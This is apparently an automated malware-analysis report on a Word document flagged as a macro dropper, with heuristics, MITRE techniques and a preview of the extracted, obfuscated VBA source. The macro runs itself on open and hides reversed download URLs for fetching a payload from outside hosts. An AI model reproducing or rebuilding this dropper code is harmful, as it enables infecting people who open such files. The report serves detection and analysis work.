MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1203 Exploitation for Client Execution
The sample contains a legacy WordBasic Autoopen macro and a critical OLE_VBA_SHELL heuristic firing, indicating it is designed to execute arbitrary code. The ClamAV detection name 'Doc.Dropper.Agent-6533394-0' further suggests its function as a dropper. The Autoopen macro is a common technique for initial execution in malicious documents, often leading to the download of further malicious content.
Heuristics 6
-
ClamAV: Doc.Dropper.Agent-6533721-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6533721-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 147389 bytes |
SHA-256: a0bd01c5637c59ffa3282eecd43a6dc82f353b78e65037406561be04081f8159 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "wrQXOmivkYFzp"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub BzkMfC(ciuCEs)
Set wvKoC = jquQUh
zSQkzr = IzEBlr
BAjXln = UHlwR + Atn(SKETrz) + 19493 - 61678 / (19079 * Hex(JCNwM))
rJCKGi = 80726 + tjuld
End Sub
Sub ioiHd(vlKohw)
Set mWUXqu = PcuHd
UpaHDY = wiVUF
OAGzO = JnCrYL + Atn(qFwCt) + 51981 - 57517 / (80142 * Hex(GKCkIu))
EBzRXj = 43890 + dfiUA
Set zBwAi = Bjbtcd
uvwiTP = wqYtfJ
mZNwJp = IJGja + Atn(rXaGpu) + 91870 - 53976 / (27231 * Hex(BKFHSH))
CUYNPG = 25745 + SoZmmp
Set tRBaQS = lOGYs
mEisB = EPBkcR
JXGWp = rHQnFr + Atn(KwjKGr) + 27278 - 2509 / (20202 * Hex(GjlFl))
rhZJDJ = 62837 + rRwBEV
End Sub
Sub cAKWG(rdlCLw)
Set zpEWG = ZFfinA
ETpuM = owdfbj
wAEoGr = XfBMZ + Atn(bwLwSW) + 41344 - 78425 / (53597 * Hex(oqqOJ))
WKdmb = 58584 + Brbvq
Set YRcURW = kjNENq
cQzQd = JIrjn
wXKFr = fuCGLV + Atn(sQcpz) + 47645 - 48119 / (71519 * Hex(wltKS))
kQathz = 48869 + abWii
End Sub
Sub Autoopen()
On Error Resume Next
Set TWEcsl = hTuKOi
bYMjIq = mfRoa
vBObu = pnajRS + Atn(ECwjjT) + 28658 - 70087 / (88954 * Hex(OpWrl))
qnoRSo = 62439 + TPXtB
llntqwANwip (ruNbl + KwtIbvZOY + qziUL)
Set BzzlYw = GjtdB
QWsMT = VjtKUc
GiqqFT = jnhEh + Atn(YpuRwR) + 23368 - 23435 / (41160 * Hex(zmOYqz))
ofJds = 48563 + toJwf
End Sub
Sub onfcXj(bLCQik)
Set tDqvPk = sZYNjQ
XKIQjs = JHlAKK
cdtuHf = pzNhu + Atn(wOGOqP) + 20881 - 7321 / (3354 * Hex(zBswjv))
uEawP = 91396 + TZkHhM
Set jmuAuB = Juzcb
tsPjnu = ScUwjT
vRfDVp = QPzwou + Atn(kKaWoL) + 73621 - 50185 / (19163 * Hex(UnUbG))
vTbab = 84765 + vGmlc
Set RmwAKi = tcsHo
HdjiU = KwBdM
GsuiP = aJwsP + Atn(nKtoX) + 36967 - 52113 / (38418 * Hex(FklMYR))
SiPIl = 63413 + pXONq
End Sub
Sub iYPOOv(cVbiC)
Set hBIJSr = LrScGj
GERIG = mHhUWw
HlzDjG = zChNwW + Atn(VnGmI) + 59168 - 78973 / (6630 * Hex(DScRG))
TnnUNd = 49241 + OvzqGE
End Sub
Attribute VB_Name = "DMkfQUaiOT"
Sub DNtkEp(ZitabI)
Set wsrqIo = wBAGsl
GtFYBZ = MBdrK
hWddk = DUbjsF + Atn(FEMtiM) + 6324 - 93791 / (37193 * Hex(oBaiCk))
NwwkBc = 44923 + WQiVi
End Sub
Function KwtIbvZOY()
On Error Resume Next
Set NTVTV = IzfHH
jpbJt = kjVtH
EcoWHv = bofai + Atn(OhjjO) + 37841 - 82387 / (55261 * Hex(vhvNWj))
uoUMaP = 86159 + mrjmf
Set KzZzHb = DuTIuI
bjrnS = lAXkVa
IDQuKu = TzIjKw + Atn(PkfWL) + 47122 - 22760 / (79779 * Hex(LSqBu))
cpihr = 36111 + iYwAjp
PBudPTUtD = AmFvzi("aYDa5t'+'SoTS7j.cfsaMT'+'2(S7jelWvRIFdaOWvRlnWW'+'vRoD'+'S7j.UYYMT8kK", 46069 - 46069 + 4 + 46069 - 46069, 46069 - 46069 + 61 + 46069 - 46069)
Set aHcUiV = rNJBX
uFcUt = JXTFdG
QFHYLr = NiDpW + Atn(YskbV) + 60747 - 38063 / (33 * Hex(ZviHz))
FHBzNv = 10752 + kpwJC
Set AapKk = hNZDZq
DFzHYL = bCffKE
GQbVYi = RlHaO + Atn(IrPfN) + 27848 - 70476 / (46487 * Hex(uLkpW))
wuKAjM = 52251 + ziBIFm
RwjNCZQk = AmFvzi("ck3FN+3FNen3FN('+'. = UYYMT2;'+'modna'+'r )3FNt3'+'F8@tn1", 10343 - 10343 + 6 + 10343 - 10343, 10343 - 10343 + 50 + 10343 - 10343)
Set qjJCi = mASwTC
WQkiLb = qzaiz
vSzLGi = vEibno + Atn(LurDM) + 20175 - 69918 / (50703 * Hex(zTwiTd))
GbFBoT = 5198 + qoQvR
Set DKpUjj = LBfiNn
vcTZI = zHoqz
ErskZO = EoFPzd + Atn(wvKMh) + 9028 - 92769 / (25250 * Hex(IDOmq))
wVwXjf = 9044 + RGPSj
ptnaSrWTw = AmFvzi("m0W3'+'FN@3FN(tilpS'+'.3FN'+'/dtVVs/m0,bv", 73781 - 73781 + 5 + 73781 - 73781, 73781 - 73781 + 34 + 73781 - 73781)
Set pNTwvc = wcJsA
fjjKcE = rkQct
sbtGRm = dVukS + Atn(Nhztpf) + 67277 - 78478 / (47958 * Hex(lvmNOr))
zqDNk = 49820 + VrGnM
Set bzWJL = BMlrE
WCnat = vEtsW
DNkcDi = TnpQCG + Atn(CFuHsj) + 20320 - 30186 / (65476 * Hex(fjksai))
jctGz = 78714 + JCKlN
CozlroMK = AmFvzi("dic9q'+'o'+'c.'+'anicileyu'+'b//:ptth'+'@/'+'sYjn/mo'+'c.'+'on'+'abrula'+'usiv/'+'/'+':pt'+'th@/8lgMSUR", 19072 - 19072 + 3 + 19072 - 19072, 19072 - 19072 + 96 + 19072 - 19072)
Set mkUuGq = mAqSn
qzWwot = ihZMs
QVzpV = BBHvM + Atn(lkYYim) + 53062 - 35703 / (35021 * Hex(bmEVsI))
FKICB = 48282
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.